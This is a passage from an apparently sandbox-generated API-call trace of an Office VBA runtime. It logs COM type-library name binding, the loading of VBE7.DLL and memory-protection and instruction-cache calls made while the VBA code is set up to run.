Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182f80 | out: ppvObject=0x182f80*=0x0) returned 0x80004002 [0042.065] IMalloc:Free (This=0x7feffc15380, pv=0x6c348d0) [0042.065] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x6bb49d0, ppTLib=0x1827c0, pIndex=0x0 | out: ppTLib=0x1827c0*=0x6990960, pIndex=0x0) returned 0x0 [0042.065] ITypeLib:RemoteGetLibAttr (in: This=0x6990960, ppTLibAttr=0x1827d0, pDummy=0x0 | out: ppTLibAttr=0x1827d0, pDummy=0x0) returned 0x0 [0042.065] ITypeLib:LocalReleaseTLibAttr (This=0x6990960) returned 0x0 [0042.065] IUnknown:Release (This=0x6990960) returned 0x9 [0042.065] ITypeInfo:RemoteGetDllEntry (in: This=0x6bb49d0, memid=1610612748, invkind=1, refPtrFlags=0x1827c0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x24c2f50 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x24c2f50*=0x5380) returned 0x0 [0042.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee460d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0042.065] strcpy_s (in: _Dst=0x6cacf00, _DstSize=0x9, _Src="VBE7.DLL" | out: _Dst="VBE7.DLL") returned 0x0 [0042.065] ITypeInfo:RemoteGetDllEntry (in: This=0x6bb49d0, memid=1610612748, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1827c0, pbstrName=0x0, pwOrdinal=0x1827e0 | out: pBstrDllName=0x1827c0*=0x0, pbstrName=0x0, pwOrdinal=0x1827e0*=0x2a50) returned 0x0 [0042.065] ITypeInfo:RemoteGetDllEntry (in: This=0x6bb49d0, memid=1610612748, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1827c0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1827c0, pwOrdinal=0x500000000) returned 0x0 [0042.065] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x412) returned 0x3e67070 [0042.065] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4b) returned 1 [0042.065] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.065] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6cacfb0 [0042.065] ITypeComp:RemoteBind (in: This=0x6990970, szName="s11", lHashVal=0x10d067, wFlags=0x5, ppTInfo=0x182ce8, pDescKind=0x182cfc, ppFuncDesc=0x182d00, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182ce8*=0x0, pDescKind=0x182cfc*=0, ppFuncDesc=0x182d00, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x505022e, cbMultiByte=4, lpWideCharStr=0x182d30, cchWideChar=5 | out: lpWideCharStr="s11") returned 4 [0042.065] ITypeComp:RemoteBind (in: This=0x6992860, szName="s11", lHashVal=0x10d067, wFlags=0x5, ppTInfo=0x182ce8, pDescKind=0x182cfc, ppFuncDesc=0x182d00, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182ce8*=0x0, pDescKind=0x182cfc*=0, ppFuncDesc=0x182d00, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x505022e, cbMultiByte=4, lpWideCharStr=0x182d30, cchWideChar=5 | out: lpWideCharStr="s11") returned 4 [0042.066] ITypeComp:RemoteBind (in: This=0x6992e00, szName="s11", lHashVal=0x10d067, wFlags=0x5, ppTInfo=0x182ce8, pDescKind=0x182cfc, ppFuncDesc=0x182d00, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182ce8*=0x0, pDescKind=0x182cfc*=0, ppFuncDesc=0x182d00, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.066] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="s11") returned 0x10d067 [0042.066] strcpy_s (in: _Dst=0x182c90, _DstSize=0x4, _Src="s11" | out: _Dst="s11") returned 0x0 [0042.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x182c90, cbMultiByte=4, lpWideCharStr=0x182ae0, cchWideChar=4 | out: lpWideCharStr="s11") returned 4 [0042.066] IUnknown:AddRef (This=0x6990960) returned 0xa [0042.066] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="s11", lHashVal=0x10d067, pfName=0x182bb0, pBstrLibName=0x182ae0 | out: pfName=0x182bb0*=0, pBstrLibName=0x182ae0) returned 0x0 [0042.066] IUnknown:Release (This=0x6990960) returned 0x9 [0042.066] IUnknown:AddRef (This=0x6992850) returned 0x12 [0042.066] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="s11", lHashVal=0x10d067, pfName=0x182bb0, pBstrLibName=0x182ae0 | out: pfName=0x182bb0*=0, pBstrLibName=0x182ae0) returned 0x0 [0042.066] IUnknown:Release (This=0x6992850) returned 0x11 [0042.066] IUnknown:AddRef (This=0x6992df0) returned 0xd [0042.066] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="s11", lHashVal=0x10d067, pfName=0x182bb0, pBstrLibName=0x182ae0 | out: pfName=0x182bb0*=0, pBstrLibName=0x182ae0) returned 0x0 [0042.066] IUnknown:Release (This=0x6992df0) returned 0xc [0042.066] IUnknown:AddRef (This=0x6992580) returned 0x7 [0042.066] ITypeLib:RemoteIsName (in: This=0x6992580, szNameBuf="s11", lHashVal=0x10d067, pfName=0x182bb0, pBstrLibName=0x182ae0 | out: pfName=0x182bb0*=0, pBstrLibName=0x182ae0) returned 0x0 [0042.066] IUnknown:Release (This=0x6992580) returned 0x6 [0042.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x505022e, cbMultiByte=4, lpWideCharStr=0x182d30, cchWideChar=5 | out: lpWideCharStr="s11") returned 4 [0042.066] ITypeComp:RemoteBind (in: This=0x6992590, szName="s11", lHashVal=0x10d067, wFlags=0x5, ppTInfo=0x182ce8, pDescKind=0x182cfc, ppFuncDesc=0x182d00, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182ce8*=0x0, pDescKind=0x182cfc*=0, ppFuncDesc=0x182d00, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x505022e, cbMultiByte=4, lpWideCharStr=0x182d30, cchWideChar=5 | out: lpWideCharStr="s11") returned 4 [0042.066] ITypeComp:RemoteBind (in: This=0x6993ee0, szName="s11", lHashVal=0x10d067, wFlags=0x5, ppTInfo=0x182ce8, pDescKind=0x182cfc, ppFuncDesc=0x182d00, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182ce8*=0x0, pDescKind=0x182cfc*=0, ppFuncDesc=0x182d00, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.066] IMalloc:Alloc (This=0x7feffc15380, cb=0xb) returned 0x6c348d0 [0042.066] _mbscpy_s (in: _Dst=0x6c348d0, _DstSizeInBytes=0x4, _Src=0x505022e | out: _Dst=0x6c348d0) returned 0x0 [0042.066] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_s11") returned 0x108d78 [0042.066] strcpy_s (in: _Dst=0x182e40, _DstSize=0xb, _Src="_B_var_s11" | out: _Dst="_B_var_s11") returned 0x0 [0042.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x182e40, cbMultiByte=11, lpWideCharStr=0x182c90, cchWideChar=11 | out: lpWideCharStr="_B_var_s11") returned 11 [0042.066] IUnknown:AddRef (This=0x6990960) returned 0xa [0042.066] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="_B_var_s11", lHashVal=0x108d78, pfName=0x182d60, pBstrLibName=0x182c90 | out: pfName=0x182d60*=0, pBstrLibName=0x182c90) returned 0x0 [0042.066] IUnknown:Release (This=0x6990960) returned 0x9 [0042.066] IUnknown:AddRef (This=0x6992850) returned 0x12 [0042.066] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="_B_var_s11", lHashVal=0x108d78, pfName=0x182d60, pBstrLibName=0x182c90 | out: pfName=0x182d60*=0, pBstrLibName=0x182c90) returned 0x0 [0042.066] IUnknown:Release (This=0x6992850) returned 0x11 [0042.066] IUnknown:AddRef (This=0x6992df0) returned 0xd [0042.067] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="_B_var_s11", lHashVal=0x108d78, pfName=0x182d60, pBstrLibName=0x182c90 | out: pfName=0x182d60*=0, pBstrLibName=0x182c90) returned 0x0 [0042.067] IUnknown:Release (This=0x6992df0) returned 0xc [0042.067] IUnknown:AddRef (This=0x6992580) returned 0x7 [0042.067] ITypeLib:RemoteIsName (in: This=0x6992580, szNameBuf="_B_var_s11", lHashVal=0x108d78, pfName=0x182d60, pBstrLibName=0x182c90 | out: pfName=0x182d60*=0, pBstrLibName=0x182c90) returned 0x0 [0042.067] IUnknown:Release (This=0x6992580) returned 0x6 [0042.067] IUnknown:AddRef (This=0x6993ed0) returned 0x7 [0042.067] ITypeLib:RemoteIsName (in: This=0x6993ed0, szNameBuf="_B_var_s11", lHashVal=0x108d78, pfName=0x182d60, pBstrLibName=0x182c90 | out: pfName=0x182d60*=0, pBstrLibName=0x182c90) returned 0x0 [0042.067] IUnknown:Release (This=0x6993ed0) returned 0x6 [0042.067] IUnknown:AddRef (This=0x6990960) returned 0xa [0042.067] IUnknown:Release (This=0x6990960) returned 0x9 [0042.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x50507b6, cbMultiByte=11, lpWideCharStr=0x182cf0, cchWideChar=12 | out: lpWideCharStr="_B_var_s11") returned 11 [0042.067] ITypeComp:RemoteBind (in: This=0x6990970, szName="_B_var_s11", lHashVal=0x108d78, wFlags=0x5, ppTInfo=0x182ca8, pDescKind=0x182cbc, ppFuncDesc=0x182cc0, ppVarDesc=0x73005f00720061, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182ca8*=0x0, pDescKind=0x182cbc*=0, ppFuncDesc=0x182cc0, ppVarDesc=0x73005f00720061, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.067] _mbscpy_s (in: _Dst=0x182eb0, _DstSizeInBytes=0x4, _Src=0x505022e | out: _Dst=0x182eb0) returned 0x0 [0042.067] ITypeComp:RemoteBind (in: This=0x6990970, szName="Right", lHashVal=0x10150d, wFlags=0x3, ppTInfo=0x182ce8, pDescKind=0x182cfc, ppFuncDesc=0x182d00, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182ce8*=0x0, pDescKind=0x182cfc*=0, ppFuncDesc=0x182d00, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5050252, cbMultiByte=6, lpWideCharStr=0x182d30, cchWideChar=7 | out: lpWideCharStr="Right") returned 6 [0042.067] ITypeComp:RemoteBind (in: This=0x6992860, szName="Right", lHashVal=0x10150d, wFlags=0x3, ppTInfo=0x182ce8, pDescKind=0x182cfc, ppFuncDesc=0x182d00, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182ce8*=0x0, pDescKind=0x182cfc*=0, ppFuncDesc=0x182d00, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5050252, cbMultiByte=6, lpWideCharStr=0x182d30, cchWideChar=7 | out: lpWideCharStr="Right") returned 6 [0042.067] ITypeComp:RemoteBind (in: This=0x6992e00, szName="Right", lHashVal=0x10150d, wFlags=0x3, ppTInfo=0x182ce8, pDescKind=0x182cfc, ppFuncDesc=0x182d00, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182ce8*=0x0, pDescKind=0x182cfc*=0, ppFuncDesc=0x182d00, ppVarDesc=0x6bb19b0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.067] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Right") returned 0x10150d [0042.067] strcpy_s (in: _Dst=0x182c90, _DstSize=0x6, _Src="Right" | out: _Dst="Right") returned 0x0 [0042.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x182c90, cbMultiByte=6, lpWideCharStr=0x182ae0, cchWideChar=6 | out: lpWideCharStr="Right") returned 6 [0042.067] IUnknown:AddRef (This=0x6990960) returned 0xa [0042.067] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="Right", lHashVal=0x10150d, pfName=0x182bb0, pBstrLibName=0x182ae0 | out: pfName=0x182bb0*=1, pBstrLibName=0x182ae0) returned 0x0 [0042.067] IUnknown:Release (This=0x6990960) returned 0x9 [0042.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Right", cchWideChar=-1, lpMultiByteStr=0x182c90, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Right", lpUsedDefaultChar=0x0) returned 6 [0042.067] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Right") returned 0x10150d [0042.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5050252, cbMultiByte=6, lpWideCharStr=0x182d30, cchWideChar=7 | out: lpWideCharStr="Right") returned 6 [0042.067] ITypeComp:RemoteBind (in: This=0x6992590, szName="Right", lHashVal=0x10150d, wFlags=0x3, ppTInfo=0x182ce8, pDescKind=0x182cfc, ppFuncDesc=0x182d00, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182ce8*=0x0, pDescKind=0x182cfc*=0, ppFuncDesc=0x182d00, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5050252, cbMultiByte=6, lpWideCharStr=0x182d30, cchWideChar=7 | out: lpWideCharStr="Right") returned 6 [0042.067] ITypeComp:RemoteBind (in: This=0x6993ee0, szName="Right", lHashVal=0x10150d, wFlags=0x3, ppTInfo=0x182ce8, pDescKind=0x182cfc, ppFuncDesc=0x182d00, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182ce8*=0x0, pDescKind=0x182cfc*=0, ppFuncDesc=0x182d00, ppVarDesc=0x7fee440230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.068] IMalloc:Alloc (This=0x7feffc15380, cb=0xd) returned 0x6c348d0 [0042.068] _mbscpy_s (in: _Dst=0x6c348d0, _DstSizeInBytes=0x6, _Src=0x5050252 | out: _Dst=0x6c348d0) returned 0x0 [0042.068] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Right") returned 0x10d939 [0042.068] strcpy_s (in: _Dst=0x182e40, _DstSize=0xd, _Src="_B_var_Right" | out: _Dst="_B_var_Right") returned 0x0 [0042.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x182e40, cbMultiByte=13, lpWideCharStr=0x182c90, cchWideChar=13 | out: lpWideCharStr="_B_var_Right") returned 13 [0042.068] IUnknown:AddRef (This=0x6990960) returned 0xa [0042.068] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="_B_var_Right", lHashVal=0x10d939, pfName=0x182d60, pBstrLibName=0x182c90 | out: pfName=0x182d60*=1, pBstrLibName=0x182c90) returned 0x0 [0042.068] IUnknown:Release (This=0x6990960) returned 0x9 [0042.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_B_var_Right", cchWideChar=-1, lpMultiByteStr=0x182e40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_B_var_Right", lpUsedDefaultChar=0x0) returned 13 [0042.068] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Right") returned 0x10d939 [0042.068] IUnknown:AddRef (This=0x6990960) returned 0xa [0042.068] IUnknown:Release (This=0x6990960) returned 0x9 [0042.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x50507e2, cbMultiByte=13, lpWideCharStr=0x182cf0, cchWideChar=14 | out: lpWideCharStr="_B_var_Right") returned 13 [0042.068] ITypeComp:RemoteBind (in: This=0x6990970, szName="_B_var_Right", lHashVal=0x10d939, wFlags=0x3, ppTInfo=0x182ca8, pDescKind=0x182cbc, ppFuncDesc=0x182cc0, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x182ca8*=0x6bb49d0, pDescKind=0x182cbc*=1, ppFuncDesc=0x182cc0, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0042.068] ITypeInfo:RemoteGetTypeAttr (in: This=0x6bb49d0, ppTypeAttr=0x182cb0, pDummy=0x1 | out: ppTypeAttr=0x182cb0, pDummy=0x1) returned 0x0 [0042.068] ITypeInfo:LocalReleaseTypeAttr (This=0x6bb49d0) returned 0x0 [0042.068] IUnknown:QueryInterface (in: This=0x6bb49d0, riid=0x7fee45d40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x182b10 | out: ppvObject=0x182b10*=0x6bb49d0) returned 0x0 [0042.068] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x6bb49d0, memid=1610612756, invkind=1, pFuncIndex=0x182b50 | out: pFuncIndex=0x182b50*=0x14) returned 0x0 [0042.068] ITypeInfo2:GetFuncCustData (in: This=0x6bb49d0, index=0x14, GUID=0x7fee45e3758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x182b68 | out: pVarVal=0x182b68*(varType=0x0, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1=0x14, varVal2=0x10d939)) returned 0x0 [0042.068] IUnknown:Release (This=0x6bb49d0) returned 0x3 [0042.068] IUnknown:AddRef (This=0x6bb49d0) returned 0x4 [0042.068] ITypeInfo:LocalReleaseFuncDesc (This=0x6bb49d0) returned 0x0 [0042.069] IUnknown:Release (This=0x6bb49d0) returned 0x3 [0042.069] IUnknown:QueryInterface (in: This=0x6bb49d0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182d68 | out: ppvObject=0x182d68*=0x0) returned 0x80004002 [0042.069] IUnknown:AddRef (This=0x6bb49d0) returned 0x4 [0042.069] IUnknown:Release (This=0x6bb49d0) returned 0x3 [0042.069] IUnknown:QueryInterface (in: This=0x6bb49d0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182f88 | out: ppvObject=0x182f88*=0x0) returned 0x80004002 [0042.069] IUnknown:QueryInterface (in: This=0x6bb49d0, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182f80 | out: ppvObject=0x182f80*=0x0) returned 0x80004002 [0042.069] IMalloc:Free (This=0x7feffc15380, pv=0x6c348d0) [0042.069] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x6bb49d0, ppTLib=0x1827c0, pIndex=0x0 | out: ppTLib=0x1827c0*=0x6990960, pIndex=0x0) returned 0x0 [0042.069] ITypeLib:RemoteGetLibAttr (in: This=0x6990960, ppTLibAttr=0x1827d0, pDummy=0x0 | out: ppTLibAttr=0x1827d0, pDummy=0x0) returned 0x0 [0042.069] ITypeLib:LocalReleaseTLibAttr (This=0x6990960) returned 0x0 [0042.069] IUnknown:Release (This=0x6990960) returned 0xa [0042.069] ITypeInfo:RemoteGetDllEntry (in: This=0x6bb49d0, memid=1610612756, invkind=1, refPtrFlags=0x1827c0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x24c2f50 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x24c2f50*=0x5380) returned 0x0 [0042.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee460d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0042.069] ITypeInfo:RemoteGetDllEntry (in: This=0x6bb49d0, memid=1610612756, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1827c0, pbstrName=0x0, pwOrdinal=0x1827e0 | out: pBstrDllName=0x1827c0*=0x0, pbstrName=0x0, pwOrdinal=0x1827e0*=0x2a50) returned 0x0 [0042.069] ITypeInfo:RemoteGetDllEntry (in: This=0x6bb49d0, memid=1610612756, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1827c0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1827c0, pwOrdinal=0x500000000) returned 0x0 [0042.069] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4b) returned 1 [0042.069] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.069] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x6bb49d0, ppTLib=0x182b90, pIndex=0x0 | out: ppTLib=0x182b90*=0x6990960, pIndex=0x0) returned 0x0 [0042.069] ITypeLib:RemoteGetLibAttr (in: This=0x6990960, ppTLibAttr=0x182ba0, pDummy=0x0 | out: ppTLibAttr=0x182ba0, pDummy=0x0) returned 0x0 [0042.069] ITypeLib:LocalReleaseTLibAttr (This=0x6990960) returned 0x0 [0042.069] IUnknown:Release (This=0x6990960) returned 0xa [0042.069] ITypeInfo:RemoteGetDllEntry (in: This=0x6bb49d0, memid=1610612748, invkind=1, refPtrFlags=0x182b90, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x24c2f50 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x24c2f50*=0x5380) returned 0x0 [0042.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee460d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0042.069] ITypeInfo:RemoteGetDllEntry (in: This=0x6bb49d0, memid=1610612748, invkind=1, refPtrFlags=0x0, pBstrDllName=0x182b90, pbstrName=0x0, pwOrdinal=0x182bb0 | out: pBstrDllName=0x182b90*=0x0, pbstrName=0x0, pwOrdinal=0x182bb0*=0x2e20) returned 0x0 [0042.069] ITypeInfo:RemoteGetDllEntry (in: This=0x6bb49d0, memid=1610612748, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x182b90, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x182b90, pwOrdinal=0x500000000) returned 0x0 [0042.069] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x6bb49d0, ppTLib=0x182b90, pIndex=0x0 | out: ppTLib=0x182b90*=0x6990960, pIndex=0x0) returned 0x0 [0042.069] ITypeLib:RemoteGetLibAttr (in: This=0x6990960, ppTLibAttr=0x182ba0, pDummy=0x0 | out: ppTLibAttr=0x182ba0, pDummy=0x0) returned 0x0 [0042.069] ITypeLib:LocalReleaseTLibAttr (This=0x6990960) returned 0x0 [0042.069] IUnknown:Release (This=0x6990960) returned 0xa [0042.069] ITypeInfo:RemoteGetDllEntry (in: This=0x6bb49d0, memid=1610612756, invkind=1, refPtrFlags=0x182b90, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x24c2f50 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x24c2f50*=0x5380) returned 0x0 [0042.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee460d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0042.070] ITypeInfo:RemoteGetDllEntry (in: This=0x6bb49d0, memid=1610612756, invkind=1, refPtrFlags=0x0, pBstrDllName=0x182b90, pbstrName=0x0, pwOrdinal=0x182bb0 | out: pBstrDllName=0x182b90*=0x0, pbstrName=0x0, pwOrdinal=0x182bb0*=0x2e20) returned 0x0 [0042.070] ITypeInfo:RemoteGetDllEntry (in: This=0x6bb49d0, memid=1610612756, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x182b90, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x182b90, pwOrdinal=0x500000000) returned 0x0 [0042.070] IMalloc:Realloc (This=0x7feffc15380, pv=0x6703120, cb=0xf2) returned 0x6c1ecb0 [0042.070] IMalloc:Free (This=0x7feffc15380, pv=0x6ccfbb0) [0042.070] GetCurrentProcess () returned 0xffffffffffffffff [0042.070] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab0e0, dwSize=0x8) returned 1 [0042.070] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a7bf68, dwSize=0x8) returned 1 [0042.070] GetCurrentProcess () returned 0xffffffffffffffff [0042.070] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a7c038, dwSize=0x8) returned 1 [0042.070] GetCurrentProcess () returned 0xffffffffffffffff [0042.070] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab018, dwSize=0x8) returned 1 [0042.070] GetCurrentProcess () returned 0xffffffffffffffff [0042.070] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab0e0, dwSize=0x8) returned 1 [0042.070] GetCurrentProcess () returned 0xffffffffffffffff [0042.070] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab270, dwSize=0x8) returned 1 [0042.070] GetCurrentProcess () returned 0xffffffffffffffff [0042.070] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab330, dwSize=0x8) returned 1 [0042.070] GetCurrentProcess () returned 0xffffffffffffffff [0042.070] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab368, dwSize=0x8) returned 1 [0042.070] GetCurrentProcess () returned 0xffffffffffffffff [0042.070] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab4a8, dwSize=0x8) returned 1 [0042.070] GetCurrentProcess () returned 0xffffffffffffffff [0042.070] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab578, dwSize=0x8) returned 1 [0042.070] SetErrorMode (uMode=0x8001) returned 0x8001 [0042.070] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0042.070] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee4230000 [0042.071] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001e5) returned 1 [0042.071] SetErrorMode (uMode=0x8001) returned 0x8001 [0042.071] GetProcAddress (hModule=0x7fee4230000, lpProcName=0x269) returned 0x7fee439d48c [0042.071] GetCurrentProcess () returned 0xffffffffffffffff [0042.071] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacff4, dwSize=0x4b) returned 1 [0042.071] RtlLookupFunctionEntry (in: ControlPc=0x6cacff4, ImageBase=0x182d98, HistoryTable=0x182da0 | out: ImageBase=0x182d98, HistoryTable=0x182da0) returned 0x0 [0042.071] VirtualProtect (in: lpAddress=0x6cacff4, dwSize=0x4c, flNewProtect=0x40, lpflOldProtect=0x182e9c | out: lpflOldProtect=0x182e9c*=0x40) returned 1 [0042.071] RtlAddFunctionTable (FunctionTable=0x6cad04c, EntryCount=0x1, BaseAddress=0x6cacf00, TargetGp=0x182e9c) returned 1 